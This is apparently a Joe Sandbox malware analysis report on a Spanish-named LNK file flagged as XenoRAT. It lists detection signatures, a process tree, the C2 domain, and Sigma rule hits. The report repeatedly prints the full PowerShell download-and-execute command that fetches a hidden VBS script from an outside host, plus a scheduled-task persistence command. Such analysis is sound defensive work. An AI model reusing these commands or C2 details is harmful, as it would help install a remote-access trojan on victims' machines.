Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TRANSFERENCIA COMPROBANTES.lnk

Overview

General Information

Sample name:TRANSFERENCIA COMPROBANTES.lnk
Analysis ID:1571198
MD5:e03e7eeb288c1f96bb336fe0bfa4cb95
SHA1:e2a53c23480aad659723ee5c8542105955787ac1
SHA256:a43b59c54921c6b5cc272e0af9917b5973231de9b6d183be381c1820416ce49f
Tags:lnkuser-abuse_ch
Infos:

Detection

XenoRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected XenoRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • WINWORD.EXE (PID: 7240 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • GFKMTE.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • GFKMTE.exe (PID: 8076 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
        • GFKMTE.exe (PID: 576 cmdline: "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe" MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 1876 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 1168 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 3672 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • GFKMTE.exe (PID: 8084 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
        • schtasks.exe (PID: 7828 cmdline: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • GFKMTE.exe (PID: 8112 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
  • svchost.exe (PID: 7408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • GFKMTE.exe (PID: 6972 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
    • GFKMTE.exe (PID: 7176 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
    • GFKMTE.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • WerFault.exe (PID: 8060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • GFKMTE.exe (PID: 5528 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XenoRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat

Malware Configuration

Threatname: XenoRAT

{"C2 url": "dns.stipamana.com", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
    00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
      0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
        00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
          0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            24.2.GFKMTE.exe.400000.0.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
              25.2.GFKMTE.exe.29ba2dc.0.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                21.2.GFKMTE.exe.293a5ec.2.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                  21.2.GFKMTE.exe.293a5ec.2.raw.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                    25.2.GFKMTE.exe.29ba2dc.0.raw.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_2892.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: File With Uncommon Extension Created By An Office Application
                        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Sigma detected: PowerShell DownloadFile
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: Script Initiated Connection to Non-Local Network
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 94.156.167.57, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6560, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
                        Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                        Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7240, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , ProcessId: 8044, ProcessName: GFKMTE.exe
                        Sigma detected: Suspicious Microsoft Office Child Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7240, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , ProcessId: 8044, ProcessName: GFKMTE.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2892, TargetFilename: C:\Users\user\Desktop\pafdfgz.vbs
                        Sigma detected: PowerShell Download Pattern
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: PowerShell Web Download
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: Script Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.156.167.57, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6560, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentProcessId: 8084, ParentProcessName: GFKMTE.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, ProcessId: 7828, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Office Outbound Connections
                        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49727, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7240, Protocol: tcp, SourceIp: 94.156.167.57, SourceIsIpv6: false, SourcePort: 443
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentProcessId: 8084, ParentProcessName: GFKMTE.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, ProcessId: 7828, ProcessName: schtasks.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
